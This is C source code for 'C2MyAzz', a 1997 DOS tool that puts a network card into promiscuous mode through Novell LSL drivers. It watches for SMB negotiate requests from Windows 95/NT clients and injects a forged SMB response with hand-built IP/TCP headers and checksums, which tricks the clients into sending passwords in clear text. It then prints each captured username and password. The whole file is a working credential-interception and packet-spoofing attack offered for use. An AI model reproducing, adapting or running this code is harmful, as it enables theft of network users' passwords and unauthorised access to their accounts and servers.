/*
    C2MyAzz - tricks Microsoft networking clients to send their passwords
    as clear text.  Displays usernames and their passwords as they attach
    to NT Server resources

*/
#include <dos.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma pack(1)

#include "c2myazz.h"

#define MAXENTRIES 20

//  Function prototypes

void    _loadds _far CntrlEntryPt  ();
void    _loadds _far RxISR         ();
u8      stuffit(IPpac _far *, PID _far *, u8 _far *);
void    _loadds _far TXCompleteESR();
void    init();
void    _loadds _far grabit();


//  Global data
void  (_far *     LSLInitEntryPt)();    //ptr to func that returns a ptr
InfoBlock		  LSLInfoBlock;         // LSL Info block - 2 ptrs
RxNode            Rnode;
u16               BoardNum;
ODIStat           Rtn;
void (_far *      LSLProtocolSupportEntryPt)();  // ptr LSL funct
void (_far *      LSLGenServicesEntryPt )();
void (_far *      MLIDSupportEntryPt)();
void (_far *      MLIDControlEntryPt)();
u8     _far *     signature;
union  REGS       regsin;
union  REGS       regsout;
struct SREGS      segs;
configtbl         cfgtab;
stattbl           stattab;
EventCB			  XmitECB={0};
u8                immAddr[6];
EventCB   _far *  ECB;
LookAhead _far *  LkAhead;
IPpac    _far *   pacptr;
u16               CurEntry = 0;           // index for big buffer
IPInfo			  Data [MAXENTRIES];      // big buffer for captured data
u16               DataEnd;
u8				  sendOK;
u8				  getpkt;
EventCB	_far * 	  RcvECB;

//*************************************************************************
//
//  Build CntrlEntryPt as required by LSL.
//  upon entry:
//             bx = function number (0-8)
//             cx = parameter as required by bx
//             es:si = ptr as required by bx
//  upon exit:
//             ax = completion code ( 0 = successful)
//             es:si = as required by bx
//             registers DS BP ES SI SS SP   preserved
//
//*******************************************************************

void _loadds _far CntrlEntryPt ()
{
   _asm
   {
      mov   ax, 0          ; preset AX to success

      test  bx, 0
      je    getcfg

      test  bx, 1
      je    getstat

      test  bx, 2
      je    LSLbind

      test  bx, 3
      je    unbind

      test  bx, 4
      je    dereg

      test  bx, 5
      je    promis

      test  bx, 6
      je    reserve

      test  bx, 7
      je    reserve

      test  bx, 8
      je    manage

      jmp   error

getcfg:
      mov   ax, SEG cfgtab
      mov   es,ax
      mov   ax,0
      mov   si,   OFFSET cfgtab
      jmp   goback

getstat:
      mov   ax,SEG stattab
      mov   es,ax
      mov   ax,0
      mov   si, OFFSET stattab
      jmp   goback

LSLbind:
      mov   ax, 08009h
      jmp   goback

unbind:
      jmp   goback

dereg:
      jmp   goback

promis:
      jmp   goback

reserve:
      jmp error

manage:
      jmp   goback

error:
      mov   ax, 08008h  ; bad command
      jmp   goback

goback:

    }
}



//*****************************************************************
//
// Rx ISR  - called by LSL
//
// 	    Grabs the lookahead buffer from LSL and passes it to Stuffit
//	    If the packet is of intereset, call LSL and get an ECB from
//	    LSL's pool, sends to grabit
//
//
//******************************************************************

#pragma check_stack(off)

void _loadds _far RxISR ()
{
    _asm
    {
        mov   word ptr LkAhead, di
        pop   ax                      ; get callers ds into ax
        push  ax
        mov   word ptr LkAhead+2, ax
        push  di
        push  si
        push  es

    }
    // Check to see if we want this packet
    getpkt=(stuffit ((IPpac _far *)LkAhead->DataPtr, &LkAhead->ProtocolID, &(LkAhead->MediaHdr[6])));

    if(getpkt == 0)
    	_asm
        {
            pop   es
            pop   si
            pop   di
            mov   ax, 8001h             ; pass to next scanner
            or    ax, ax                ; set ZF based on value of AX
        }
    else
    {
        _asm
        {
            mov 	bx,0                ;Get an ECB from LSL's pool
            call  far ptr LSLProtocolSupportEntryPt
            mov		word ptr[RcvECB],si
            mov     word ptr[RcvECB+2],es
        }

        // Fill out the necessary fields in the ECB

        RcvECB->BoardNum=0;
        RcvECB->ProtocolID[0]=0;
        RcvECB->ProtocolID[1]=0;
        RcvECB->ProtocolID[2]=0;
        RcvECB->ProtocolID[3]=0;
        RcvECB->ProtocolID[4]=8;
        RcvECB->ProtocolID[5]=0;
        RcvECB->ProtocolNum=0xABCD;
        RcvECB->DataLen=1480;
        RcvECB->Frag1Len=1480;
        RcvECB->FragCnt=1;
        RcvECB->ECBISR=grabit;
        RcvECB->Frag1Addr=((u8 far *)((void far *)RcvECB)+(((sizeof(EventCB)+3)>> 2) << 2));

        _asm
        {
            add 	sp,4
            mov 	word ptr ss:[bp-4],si
            xor		ax, ax              ;clear AX and reset ZF
            pop		di
        }
   }
}


//*************************************************************
// Init - checks for supporting software and hardware
//
//*************************************************************

void init()
{
u16     i;
u16     ComCode;

    //*****************************************************************
    //  Initialization routines
    //  Check to see if LSL is loaded (int vector 2F is viable)

    regsin.x.ax = 0x352f;

    intdosx ( &regsin, &regsout, &segs);

    if (((regsout.x.bx | segs.es ) ==  0) ||  ((regsout.x.bx & segs.es ) == -1))
    {
        printf ("C2MyAzz: LSL not loaded.  Exiting.\n ");
        exit;
    }

    // Locate the LSL intial entry pt.  Note that we're scanning
    // for TSRs, starting at C0 to FF.

    for ( i = 0xC0; i < 0xFF;  i ++)
    {
        regsin.h.ah = i;
        regsin.h.al = 0;

        int86x (0x2F, &regsin, &regsout, &segs);

        if ( regsout.h.al == 0xFF)    // something is installed, check it
        {
            (long)signature = (long)regsout.x.si ;         // ptr to LSL id
            (long)signature = ((long)segs.es << 16) | (long)signature;

            if (_fstrncmp ((u8 _far *)signature, (u8 _far *)"LINKSUP$", 8))  // check for LSL id
                continue;                              // not LSL, continue
            else
            {
                (long)LSLInitEntryPt = (long)regsout.x.bx ;
                (long)LSLInitEntryPt = (long)LSLInitEntryPt | ((long)regsout.x.dx << 16);
            break;                                 // got LSL exit loop
            }
        }
    }

    if (!LSLInitEntryPt)
    {
        printf ("C2MyAzz: LSL is not loaded \n ");
        exit;
    }


    LSLInfoBlock.LSLAPI = 0;

    // call the LSL initial entry pt to fill in the LSL info block

    _asm
    {
        push  es
        push  ds
        mov   ax, SEG LSLInfoBlock
        mov   es, ax
        mov   si, OFFSET LSLInfoBlock             ; ES:SI = ptr to info block
        mov   bx, 4                               ; bx    = req code 4
        call  far ptr LSLInitEntryPt              ; get LSL info block
        pop   ds
        pop   es
    }

    // move function ptrs from info block (optional)

    LSLProtocolSupportEntryPt  = (void (_far *)())LSLInfoBlock.LSLAPI;
    LSLGenServicesEntryPt      = (void (_far *)())LSLInfoBlock.GSAPI;
    MLIDSupportEntryPt         = (void (_far *)())LSLInfoBlock.MLIDAPI;
    // Assume that we're only dealing with one board
    BoardNum = 0;

    // Get MLID Control Entry point for later use

    _asm
    {
        push  es
        push  ds
        mov   ax, BoardNum
        mov   bx, 012h					                 ;  Get MLID Control Entry Pt
        call  far ptr LSLProtocolSupportEntryPt
        mov   word ptr [MLIDControlEntryPt], si
        mov   word ptr [MLIDControlEntryPt +2], es
        pop   ds
        pop   es
        mov   ComCode, ax
    }

    if (ComCode != 0)
    {
        printf ("C2MyAzz: cannot get MLID control entry pt rtn = %x.  Is your MLID loaded? \n", ComCode);
        exit;
    }

	// Set the look ahead size of MLID to 128 bytes
	_asm
    {
        push  es
        push  ds
        mov   ax, BoardNum
        mov   bx, 9												;set look ahead size
        mov   cx, 80h
        call  far ptr MLIDControlEntryPt
        pop   ds
        pop   es
        mov   ComCode, ax
    }

    if (ComCode != 0)
    {
        printf ("C2MyAzz: cannot set look ahead size to 128 rtn = %x \n", ComCode);
        exit;
    }

    printf ("C2MyAzz: Lookahead set to 128 bytes \n");

    // Register the RX prescanner stack with LSL
    // init RX Node CB

    Rnode.boardnum          = BoardNum;
    Rnode.position          = LAST_MUST;
    Rnode.ISR               = &RxISR;
    Rnode.StackID           = 0xABCD;
    Rnode.ControlEntryPt    = &CntrlEntryPt;
    Rnode.PacFilterMsk      = 0xFFFF;

    _asm
    {
        push  es
        push  ds
        mov   ax,ds
        mov   es,ax
        mov   si, OFFSET Rnode
        mov   bx, 01Ch											;register the RX prescanner
        call  far ptr LSLProtocolSupportEntryPt
        pop   ds
        pop   es
        mov   ComCode, ax
    }

    if (ComCode != 0)
    {
        printf("C2MyAzz: cannot register RX prescanner rtn = %x \n", ComCode);
        exit;
    }

    printf("C2MyAzz: Receive prescanner now registered \n");

    // Enable promiscuous mode on the adapter so the we will receive all packets

    _asm
    {
        push  es
        push  ds
        mov   ax, BoardNum
        mov   bx, 0ah											;set promiscuous mode
        mov   cx, 1												;all frames
        call  far ptr MLIDControlEntryPt
        pop   ds
        pop   es
        mov   ComCode, ax
    }

    if (ComCode != 0)
    {
        printf("C2MyAzz: cannot set board in promiscuous mode rtn = %x \n", ComCode);
        printf("         Does your board support promiscuous mode? \n");
        exit;
    }
    printf ("C2MyAzz: Board now in promiscuous mode \n");

	// Reset prescan stack to accept all frames

 	i=Rnode.StackID;	// Cheat the assembler
    _asm
    {
        push  es
        push  ds
        mov   ax, BoardNum
        mov   bx, 02bh											;modify stack filter
        mov   cx, i
        mov   dx, 0ffffh										;take everything
        call  far ptr LSLProtocolSupportEntryPt
        pop   ds
        pop   es
        mov   ComCode, ax
    }

    if (ComCode != 0)
    {
        printf("C2MyAzz: cannot set stack filter rtn = %x \n", ComCode);
        exit;
    }
}



//*****************************************************************************
//	Uninit - deregisters the prescan stack
//*****************************************************************************

void uninit(void)
{
	u16	ComCode;

    _asm
    {
        push  es
        push  ds
        mov   ax,ds
        mov   es,ax
        mov   si, OFFSET Rnode
        mov   bx, 01Fh											;Deregister the RX prescanner
        call  far ptr LSLProtocolSupportEntryPt
        pop   ds
        pop   es
        mov   ComCode, ax
    }

    if (ComCode != 0)
    {
        printf("C2MyAzz: cannot deregister RX prescanner rtn = %x \n", ComCode);
        return;
    }
}

u8 stuffit(IPpac _far *pacptr, PID _far *pid, u8 _far *immAddr)
{
    //Check to see if this is an SMB within IP
    if (_fstrncmp((void far *)pacptr->x.SMB.IDString, (void far *) "SMB", 3) != 0)
        return(0);

    //Is this packet a SMB Neg Request?
    if(pacptr->x.SMB.FunctionCode < 0x72)
        return(0);

    //Is this packet creating a server connection?
    if(pacptr->x.SMB.FunctionCode > 0x73)
        return(0);

    //Must be a packet of interest.
        return(1);
}

void _loadds _far grabit(void)
{
    //Grab what we need from the packet
	if (CurEntry < MAXENTRIES)    // test for overflow
	{
        pacptr=(IPpac _far *)RcvECB->Frag1Addr;

        Data[CurEntry].size=((pacptr->length >> 8) & 0x00FF) | ((pacptr->length << 8)& 0xFF00);
        _fmemmove((void far *) Data[CurEntry].data, (void far *) pacptr, Data[CurEntry].size);
        _fmemmove((void far *) &Data[CurEntry].pid, (void far *) RcvECB->ProtocolID, sizeof(PID));
        _fmemmove((void far *) Data[CurEntry].immAddr, (void far *) RcvECB->ImmAddr, 6);
        _fmemmove((void far *) &Data[CurEntry].type, (void far *)pacptr->x.SMB.FunctionCode, 2);

        _asm
        {
            mov     bx,1			  		;Return ECB to LSL pool
            mov     si, word ptr[RcvECB]
            mov     es, word ptr[RcvECB+2]
            call    far ptr LSLProtocolSupportEntryPt
            xor     ax, ax				  	;clear AX and reset ZF
        }

        CurEntry++;                   // bump counter for next packet
    }
}

#pragma check_stack(on)

//*************************************************************
// Empty transmit complete ESR for LSL
//
//*************************************************************

void _loadds _far TXCompleteESR()
{
	// Stack is ready for the next packet
	sendOK=0;
}


//*************************************************************
//
//  Main processing of the packet occurs here.
//	Setup the forged ECB, then loop until a packet comes in
//
//*************************************************************


main ()
{
    IPpac		*ECBData;
    u8			buffer[256];
    ODIStat		Rtn;
    u16			i;
    u16			ComCode;
    u16			j;
    ODIStat		Stat;
    int			ch;
    u32			SourceAddress;
    u32			DestAddress;
    u16			sourcePort;
    u16			destPort;
    u32			seqNum;
    u32			ackNum;
    u32			nextseqNum;
    u16			MuxID;
    u16			TreeID;
    u16			ProcID;
    u8			type;
    PID			pid;
    char		password[24];
    char		username[16];
    u8			commandresp;
    u32			sum;
    u16			*ptr;
    u16			pktlen;
    u8			foundpw;
    u8			pwlen;
    u8			wstype;		// 0 if 95, 1 if NT

    printf("C2MyAzz - Tricks Microsoft Networking clients to send their password as\n");
    printf("          clear text. Displays a username/password combination. \n");
    printf("          C2MyAzz requires LSL and a promiscuous mode LAN driver.\n\n");
    printf("          Use at your own risk.  Read Microsoft's CIFS documentation\n");
    printf("          for more NT security holes.  Copyright(c) 1997 \n\n\n");


    // Setup for prescan
    init();
    printf("C2MyAzz: All packets will now be received\n");
    printf("C2MyAzz: Ready to scan for passwords\n");
    printf("C2MyAzz: (press any key to exit)\n\n\n");

    // Setup some of the static ECB information so that we don't waste cycles
    // when processing the packets

    XmitECB.Frag1Addr = buffer;
    ECBData = (IPpac *)buffer;
    XmitECB.DataLen = 105;
    XmitECB.ECBISR = TXCompleteESR;
    XmitECB.Frag1Len = 105;
    XmitECB.BoardNum = BoardNum;
    XmitECB.FragCnt = 1;
    XmitECB.NxtECB = (void far *) 0;
    XmitECB.PreECB = (void far *) 0;

    ECBData->version=0x45;
    ECBData->type=0x00;
    ECBData->length=0x6900;              // Must byte-swap all words
    ECBData->identification=0xEEEE;      // Should be ignored since no fragging
    ECBData->flags1=0x0040;
    ECBData->ttl=0x80;
    ECBData->protocol=0x06;
    ECBData->window=0x5221;
    ECBData->dataOffset=0x50;
    ECBData->flags2=0x18;
    ECBData->pad1=0x00;
    ECBData->nbtype=0x00;
    ECBData->nbflags=0x00;
    ECBData->nblength=0x4100;

    // Setup the ECB data for a raw send.  We're building the SMB packet to spoof
    // client into sending their password clear text on the wire.  Most of the
    // information was taken from an SMB client accessing our local SAMBA server

    ECBData->x.RAW.buf[0]=0xff;
    ECBData->x.RAW.buf[1]=0x53;
    ECBData->x.RAW.buf[2]=0x4d;
    ECBData->x.RAW.buf[3]=0x42;
    ECBData->x.RAW.buf[4]=0x72;
    ECBData->x.RAW.buf[5]=0x00;
    ECBData->x.RAW.buf[6]=0x00;
    ECBData->x.RAW.buf[7]=0x00;
    ECBData->x.RAW.buf[8]=0x00;
    ECBData->x.RAW.buf[9]=0x81;
    ECBData->x.RAW.buf[10]=0x00;
    ECBData->x.RAW.buf[11]=0x00;
    ECBData->x.RAW.buf[12]=0x00;
    ECBData->x.RAW.buf[13]=0x00;
    ECBData->x.RAW.buf[14]=0x00;
    ECBData->x.RAW.buf[15]=0x00;
    ECBData->x.RAW.buf[16]=0x00;
    ECBData->x.RAW.buf[17]=0x00;
    ECBData->x.RAW.buf[18]=0x00;
    ECBData->x.RAW.buf[19]=0x00;
    ECBData->x.RAW.buf[20]=0x00;
    ECBData->x.RAW.buf[21]=0x00;
    ECBData->x.RAW.buf[22]=0x00;
    ECBData->x.RAW.buf[23]=0x00;

    // We need the Tree ID, Process ID, and Mux ID from the look ahead buffer
    // since these fields change on every connection
    //ECBData->x.RAW.buf[24]=0x00;  Tree ID
    //ECBData->x.RAW.buf[25]=0x00;
    //ECBData->x.RAW.buf[26]=0xbf;  Process ID
    //ECBData->x.RAW.buf[27]=0x1b;

    ECBData->x.RAW.buf[28]=0x00;
    ECBData->x.RAW.buf[29]=0x00;

    //ECBData->x.RAW.buf[30]=0x81;  Mux ID
    //ECBData->x.RAW.buf[31]=0x40;

    ECBData->x.RAW.buf[32]=0x0D;
    ECBData->x.RAW.buf[33]=0x02;    // Dialect 2 for 95 ws, Dialect 5 for NT
    ECBData->x.RAW.buf[34]=0x00;
    ECBData->x.RAW.buf[35]=0x01;
    ECBData->x.RAW.buf[36]=0x00;
    ECBData->x.RAW.buf[37]=0x04;
    ECBData->x.RAW.buf[38]=0x11;
    ECBData->x.RAW.buf[39]=0x02;
    ECBData->x.RAW.buf[40]=0x00;
    ECBData->x.RAW.buf[41]=0x01;
    ECBData->x.RAW.buf[42]=0x00;
    ECBData->x.RAW.buf[43]=0x03;
    ECBData->x.RAW.buf[44]=0x00;
    ECBData->x.RAW.buf[45]=0xB0;
    ECBData->x.RAW.buf[46]=0x8B;
    ECBData->x.RAW.buf[47]=0xA1;
    ECBData->x.RAW.buf[48]=0x00;
    ECBData->x.RAW.buf[49]=0x2B;
    ECBData->x.RAW.buf[50]=0x52;
    ECBData->x.RAW.buf[51]=0x5C;
    ECBData->x.RAW.buf[52]=0x22;
    ECBData->x.RAW.buf[53]=0xA4;
    ECBData->x.RAW.buf[54]=0x01;
    ECBData->x.RAW.buf[55]=0x00;
    ECBData->x.RAW.buf[56]=0x00;
    ECBData->x.RAW.buf[57]=0x00;
    ECBData->x.RAW.buf[58]=0x00;
    ECBData->x.RAW.buf[59]=0x00;
    ECBData->x.RAW.buf[60]=0x00;
    ECBData->x.RAW.buf[61]=0x00;
    ECBData->x.RAW.buf[62]=0x00;
    ECBData->x.RAW.buf[63]=0x00;
    ECBData->x.RAW.buf[64]=0x00;
    ECBData->x.RAW.buf[65]=0x00;
    ECBData->x.RAW.buf[66]=0x00;
    ECBData->x.RAW.buf[67]=0x00;
    ECBData->x.RAW.buf[68]=0x00;
    ECBData->x.RAW.buf[69]=0x00;
    ECBData->x.RAW.buf[70]=0x00;
    ECBData->x.RAW.buf[71]=0x00;
    ECBData->x.RAW.buf[72]=0x00;
    ECBData->x.RAW.buf[73]=0x00;
    ECBData->x.RAW.buf[74]=0x00;
    ECBData->x.RAW.buf[75]=0x00;
    ECBData->x.RAW.buf[76]=0x00;
    ECBData->x.RAW.buf[77]=0x00;
    ECBData->x.RAW.buf[78]=0x00;
    ECBData->x.RAW.buf[79]=0x00;
    ECBData->x.RAW.buf[80]=0x00;
    ECBData->x.RAW.buf[81]=0x00;
    ECBData->x.RAW.buf[82]=0x00;
    ECBData->x.RAW.buf[83]=0x00;
    ECBData->x.RAW.buf[84]=0x00;
    ECBData->x.RAW.buf[85]=0x00;
    ECBData->x.RAW.buf[86]=0x00;
    ECBData->x.RAW.buf[87]=0x00;
    ECBData->x.RAW.buf[88]=0x00;
    ECBData->x.RAW.buf[89]=0x00;
    ECBData->x.RAW.buf[90]=0x00;
    ECBData->x.RAW.buf[91]=0x00;
    ECBData->x.RAW.buf[92]=0x00;
    ECBData->x.RAW.buf[93]=0x00;
    ECBData->x.RAW.buf[94]=0x00;
    ECBData->x.RAW.buf[95]=0x00;
    ECBData->x.RAW.buf[96]=0x00;
    ECBData->x.RAW.buf[97]=0x00;
    ECBData->x.RAW.buf[98]=0x00;
    ECBData->x.RAW.buf[99]=0x00;
    ECBData->x.RAW.buf[100]=0x00;
    ECBData->x.RAW.buf[101]=0x00;
    ECBData->x.RAW.buf[102]=0x00;            //last byte
    ECBData->x.RAW.buf[103]=0x01;

    // Setup some of the variables that we'll use later
    foundpw=0;
    sendOK=0;
    wstype=0;


    do
    {
        do
        {
            // Loop until someone hits a key or until we have a packet to process
            if(kbhit())
            {
                printf("C2MyAzz: Exiting\n");
                uninit();
                exit(0);
            }
        } while (CurEntry == 0);  //Loop until we get a packet

    // Grab data out of packet to determine whether or not to proceed
    type = (u8) (((IPpac *)(Data[0].data))->x.SMB.FunctionCode);
    commandresp = (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.cmdresp);

    // NT and 95 use different username / password combinations.  Check
    // to see if the client is a 95 or NT workstation.  Note that we're checking
    // to see if the workstation supports long filenames (0x3 = NT), or DOS
    // 8.3 only (0x0 = 95).  This is an assumption based on observation.  We
    // could use additional information in the packet to determine NT or 95.

    if((((IPpac *)(Data[0].data))->x.SMB.Flags2) == 0x3)
    	wstype=1;	// Looks like an NT Workstation
    else
    	wstype=0;	// Otherwise, a Windows 95 machine

    // If this is a SMB NEG PROT and this is a request, grab information
    // for the transmit ECB
    if((type == 0x72) && (!(commandresp & 0x80)))
    {
        SourceAddress=(u32)(((IPpac *)(Data[0].data))->srcaddr);
        DestAddress=(u32)(((IPpac *)(Data[0].data))->destaddr);
        sourcePort=(u16)(((IPpac *)(Data[0].data))->srcport);
        destPort=(u16)(((IPpac *)(Data[0].data))->destport);
        seqNum=(u32)(((IPpac *)(Data[0].data))->seqnumber);
        ackNum=(u32)(((IPpac *)(Data[0].data))->acknumber);
        MuxID = (u16) (((IPpac *)(Data[0].data))->x.SMB.muxId);
        TreeID = (u16) (((IPpac *)(Data[0].data))->x.SMB.TreeID);
        ProcID = (u16) (((IPpac *)(Data[0].data))->x.SMB.ProcessID);
        pktlen = (u16) (((IPpac *)(Data[0].data))->length);
        memmove(&pid, &Data[0].pid, sizeof(PID));
        memmove(&immAddr, &Data[0].immAddr, sizeof(immAddr));
        memmove(XmitECB.ImmAddr, (void *) immAddr, 6);
        memmove(&XmitECB.ProtocolID, &pid, sizeof(PID));
        *((u32 *)(&(ECBData->destaddr)))=SourceAddress;
        *((u32 *)(&(ECBData->srcaddr)))=DestAddress;
        *((u16 *)(&(ECBData->destport)))=sourcePort;
        *((u16 *)(&(ECBData->srcport)))=destPort;
        *((u32 *)(&(ECBData->seqnumber)))=ackNum;
        *((u16 *)(&(ECBData->x.RAW.buf[24])))=TreeID;
        *((u16 *)(&(ECBData->x.RAW.buf[26])))=ProcID;
        *((u16 *)(&(ECBData->x.RAW.buf[30])))=MuxID;

        if(wstype == 1)
            ECBData->x.RAW.buf[33]=0x05;	//NT Workstation uses dialect 5
        else
            ECBData->x.RAW.buf[33]=0x02;	//95 Workstation uses dialect 2

        // Need to calculate the IP and TCP headers.  Start by setting up for
        // grabbing the sequence numbers of the previous packets, and ca
        seqNum=flipbyte32(seqNum);
        pktlen=flipbyte16(pktlen);

        // Ack number is last packet + data - header
        nextseqNum=(seqNum + pktlen - 40);
        nextseqNum=flipbyte32(nextseqNum);
        *((u32 *)(&(ECBData->acknumber)))=nextseqNum;
        seqNum=flipbyte32(seqNum);
        pktlen=flipbyte16(pktlen);

        // Calculate the IP and TCP checksums
        // Initially set the CRCs to zero
        ECBData->headerCRC=0x0000;
        ECBData->tcpCRC=0x0000;
        sum=0;

        // Start by adding up all the bytes in IP header
        ptr=(u16 *)ECBData;
        for(j=0;j<10;j++)
            sum+=(ptr[j]);

        // Add any overflow into the sum
        sum=(sum>>16)+(sum & 0xffff);
        sum+=(sum>>16);
        // Take 1's complement
        ECBData->headerCRC=~sum;

        // Calculate the TCP Checksum
        // Note that we need to first create a pseudo-header for
        // use in the TCP checksum.  For more information, see page
        // 186 of "Internetworking with TCP/IP" by Comer
        sum=0;                // Clear sum from last calculation
        sum+=ptr[6];          // Add up the IP address
        sum+=ptr[7];
        sum+=ptr[8];
        sum+=ptr[9];
        sum+=0x0600;		  // Add in the protocol ID for TCP in IP
        sum+=0x5400;		  // Add in the length of TCP data
        for(j=10;j<74;j++)    // Add up the bytes in the ECB
            sum+=(ptr[j]);

    	// Add any overflow into the sum
        sum=(sum>>16)+(sum & 0xffff);
        sum+=(sum>>16);

        // Take 1's complement
        ECBData->tcpCRC=~sum;


        if((foundpw == 0) && (sendOK == 0))
        {
            // SendOK is reset after the packet is sent
            sendOK=1;
            // Pass the ECB to LSL for a raw send
            _asm
            {
                push  es
                push  ds
                mov	  ax, SEG XmitECB
                mov   es, ax                    ;Whew!  Lots of work just to get
                mov   si, OFFSET XmitECB        ;a packet on the wire.
                mov   bx, 0ch                   ;Let's transmit this tiresome hag
                call  far ptr LSLProtocolSupportEntryPt
                mov   ComCode, ax
                pop   ds
                pop   es
            }
        }
        else
            foundpw=0;
    }  // End of packet send routine

    // If we've received the client's password, display it on the screen
    if(type == 0x73)
    {
        memmove(password, ((IPpac*)(Data[0].data))->x.USERPWNT.password, 32);
        memmove(username, ((IPpac*)(Data[0].data))->x.USERPW95.username, 15);
        pwlen = (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.pwlength);

        // Since the password could be null, check to see if it appears
        // to be a valid password.  Is the first character of the password
        // a valid ASCII character?
        if((password[0] >= 0x21) && (password[0] <= 0x5D))
        {
            // If we spoof every packet, we won't connect to IPC to find the
            // shares of the domain.  By spoofing every other packet, we'll let
            // the connection go through after a retry.  This approach will
            // present the user with an error screen after attempting to connect
            // to the doamin, but if the user retries, we'll backoff and let
            // the user through
            foundpw=1;
            if(wstype == 1)
                printf("User %s password is %s\n",&password[strlen(password)+1], password);
            else
            	{
                // Need to null terminate the strings
                password[23]=0x00;
                username[15]=0x00;
                printf("User %s password is %s\n", username, password);
                }
        }
	} // End of password display routine

	// Now that we've processed the packet, clear the buffer of the processed
	// packet.  Note that we're disabling interrupts because we might
	// get stomped with a new packet while we're clearing out the old packet

	_disable();
	memmove(Data, &Data[1],(sizeof(Data) - sizeof(IPInfo)));
	CurEntry--;
	_enable();

    } while (1);
}


